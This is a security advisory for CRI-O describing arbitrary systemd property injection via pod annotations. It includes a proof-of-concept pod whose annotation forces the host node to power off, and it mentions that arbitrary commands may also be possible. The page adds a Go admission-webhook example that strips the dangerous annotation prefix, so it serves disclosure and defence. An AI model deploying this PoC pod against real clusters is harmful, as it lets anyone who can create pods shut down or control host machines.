GitHub Advisory Database: GHSA-2CGQ-H8XW-2V5J
Published: 2024-04-30 09:39:38 (Apr 30, 2024, 9:39 a.m.)

CRI-O vulnerable to an arbitrary systemd property injection

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
Source: GitHub Advisory Database (github.com)
Keywords: cri-o, systemd property injection, arbitrary action, host system, pod annotation, minikube, Cédric Clerget, OCI annotations, filtering, unsafe annotations, external mutating webhook

EPSS: 0.0004 (Low), percentile 12.7%

Impact

On CRI-O, an arbitrary systemd property can be injected via a Pod annotation. The following pod is a proof of concept:

---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
    - name: hello
      image: quay.io/podman/hello

This means that any user who can create a pod with an arbitrary annotation can perform an arbitrary action on the host system. Nothing inside the container is needed: CRI-O copies pod annotations into the OCI runtime spec, and runc's systemd cgroup driver translates every annotation prefixed org.systemd.property. into a property of the transient systemd unit it creates for the container, so the value is acted on by PID 1 on the host. In the proof of concept above, SuccessAction=poweroff-force makes systemd force a power-off of the node as soon as the container's unit stops cleanly.

Tested with CRI-O v1.24 on minikube.
I didn’t test the latest v1.29 because it is incompatible with minikube: https://github.com/kubernetes/minikube/pull/18367

Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations through as OCI annotations:
https://github.com/opencontainers/runc/pull/3923#discussion_r1532292536

CRI-O has to filter out annotations that have the prefix "org.systemd.property." before it hands pod annotations to the OCI runtime.

Workarounds

Unfortunately, the only workaround is an external mutating admission webhook that strips (or rejects) pod annotations carrying the org.systemd.property. prefix before the pod is persisted; CRI-O itself has no setting to disallow them.
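The two fixes named above, the prefix filter CRI-O has to apply before copying pod annotations into the OCI spec and the mutating webhook that strips the same annotations at admission time, in one added Go example written for this page (editor's code, not CRI-O's or any upstream webhook's). The AdmissionReview structs are a hand-written subset of the admission.k8s.io/v1 wire format so that it runs with only the standard library; the sample pod, the harmless example.com/owner annotation and the function names are constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// runc's systemd cgroup driver turns annotations with this prefix into properties
// of the container's transient unit, i.e. they are interpreted by PID 1 on the host.
const systemdPropertyPrefix = "org.systemd.property."

// FilterUnsafeAnnotations returns a copy of annotations without any key carrying the
// prefix, plus the sorted dropped keys: the check CRI-O has to run before the OCI spec is built.
func FilterUnsafeAnnotations(annotations map[string]string) (map[string]string, []string) {
	safe := make(map[string]string, len(annotations))
	var dropped []string
	for k, v := range annotations {
		if strings.HasPrefix(k, systemdPropertyPrefix) {
			dropped = append(dropped, k)
			continue
		}
		safe[k] = v
	}
	sort.Strings(dropped)
	return safe, dropped
}

// Hand-written subset of the admission.k8s.io/v1 AdmissionReview wire format (only
// the fields used here), so the example needs no Kubernetes client library.
type admissionReview struct {
	APIVersion string             `json:"apiVersion"`
	Kind       string             `json:"kind"`
	Request    *admissionRequest  `json:"request,omitempty"`
	Response   *admissionResponse `json:"response,omitempty"`
}
type admissionRequest struct {
	UID    string          `json:"uid"`
	Object json.RawMessage `json:"object"` // the Pod as submitted
}
type admissionResponse struct {
	UID       string  `json:"uid"`
	Allowed   bool    `json:"allowed"`
	PatchType *string `json:"patchType,omitempty"`
	Patch     []byte  `json:"patch,omitempty"` // encoding/json base64-encodes it, as the API expects
}
type jsonPatchOp struct {
	Op   string `json:"op"` // RFC 6902 operation; only "remove" is used here
	Path string `json:"path"`
}

// escapeJSONPointer escapes "~" and "/" in a key as RFC 6901 requires ("~0", "~1").
func escapeJSONPointer(key string) string {
	return strings.NewReplacer("~", "~0", "/", "~1").Replace(key)
}

// BuildPatch returns a JSON Patch removing every unsafe annotation (nil if none) and the dropped keys.
func BuildPatch(pod []byte) ([]byte, []string, error) {
	var obj struct {
		Metadata struct {
			Annotations map[string]string `json:"annotations"`
		} `json:"metadata"`
	}
	if err := json.Unmarshal(pod, &obj); err != nil {
		return nil, nil, err
	}
	_, dropped := FilterUnsafeAnnotations(obj.Metadata.Annotations)
	if len(dropped) == 0 {
		return nil, nil, nil
	}
	ops := make([]jsonPatchOp, 0, len(dropped))
	for _, k := range dropped {
		ops = append(ops, jsonPatchOp{Op: "remove", Path: "/metadata/annotations/" + escapeJSONPointer(k)})
	}
	patch, err := json.Marshal(ops)
	return patch, dropped, err
}

// Mutate answers one AdmissionReview (caller has checked Request != nil): the pod is
// admitted with the patch attached; an object that cannot be decoded is rejected, not let through.
func Mutate(review admissionReview) admissionReview {
	resp := &admissionResponse{UID: review.Request.UID, Allowed: true}
	if patch, _, err := BuildPatch(review.Request.Object); err != nil {
		resp.Allowed = false
	} else if patch != nil {
		pt := "JSONPatch"
		resp.PatchType, resp.Patch = &pt, patch
	}
	return admissionReview{APIVersion: "admission.k8s.io/v1", Kind: "AdmissionReview", Response: resp}
}

// Constructed sample: the advisory's PoC pod plus one harmless annotation.
const samplePod = `{"metadata":{"name":"poc","annotations":{"org.systemd.property.SuccessAction":"'poweroff-force'",` +
	`"example.com/owner":"platform"}},"spec":{"containers":[{"name":"hello","image":"quay.io/podman/hello"}]}}`

func main() {
	out := Mutate(admissionReview{Request: &admissionRequest{UID: "demo", Object: json.RawMessage(samplePod)}})
	fmt.Printf("allowed=%v patch=%s\n", out.Response.Allowed, out.Response.Patch)
}
```

To deploy the webhook half, decode the AdmissionReview from the request body, check that Request is set, and write the result of Mutate back as JSON from an HTTPS handler (the API server only calls webhooks over TLS). A validating webhook or admission policy that rejects any key under org.systemd.property. is an equivalent alternative to stripping; either way the filter has to live in front of the API server, because once the pod object exists CRI-O (before the fix) will forward the annotation unchanged.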
